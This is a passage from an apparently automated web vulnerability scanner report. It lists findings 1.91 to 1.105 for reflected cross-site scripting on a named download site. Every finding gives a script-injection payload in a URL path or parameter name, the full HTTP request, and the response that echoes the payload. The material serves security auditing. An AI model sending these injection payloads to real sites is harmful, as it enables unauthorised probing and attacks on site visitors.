<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2" />
...[SNIP]...

1.91. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9892e"><script>alert(1)</script>5d9734d7e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1" />
...[SNIP]...

1.92. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430b8"><script>alert(1)</script>a87f0fbe7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8" />
...[SNIP]...

1.93. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6ec"><script>alert(1)</script>984fa8fe340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1" />
...[SNIP]...

1.94. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdb3"><script>alert(1)</script>4b97b90929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929" />
...[SNIP]...

1.95. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bd1"><script>alert(1)</script>f6291253f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1" />
...[SNIP]...

1.96. http://www.x64bitdownload.com/64-bit-par-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0759"><script>alert(1)</script>6fd3ce475e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7" />
...[SNIP]...

1.97. http://www.x64bitdownload.com/64-bit-par-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c878"><script>alert(1)</script>7559f64c803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1" />
...[SNIP]...

1.98. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7970"><script>alert(1)</script>88378e0e2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5" />
...[SNIP]...

1.99. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4622"><script>alert(1)</script>bdc4521abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1" />
...[SNIP]...

1.100. http://www.x64bitdownload.com/64-bit-rar-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b2e"><script>alert(1)</script>6e0959531ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff" />
...[SNIP]...

1.101. http://www.x64bitdownload.com/64-bit-rar-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e87e"><script>alert(1)</script>7391c84ac49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1" />
...[SNIP]...

1.102. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf657"><script>alert(1)</script>ba7bde42ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab" />
...[SNIP]...

1.103. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce3f"><script>alert(1)</script>fad1e3471a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1" />
...[SNIP]...

1.104. http://www.x64bitdownload.com/64-bit-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc2d"><script>alert(1)</script>fcd3dfde6f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3" />
...[SNIP]...

1.105. http://www.x64bitdownload.com/64-bit-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14914"><script>alert(1)</script>113a0fba4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1" />
...[SNIP]...

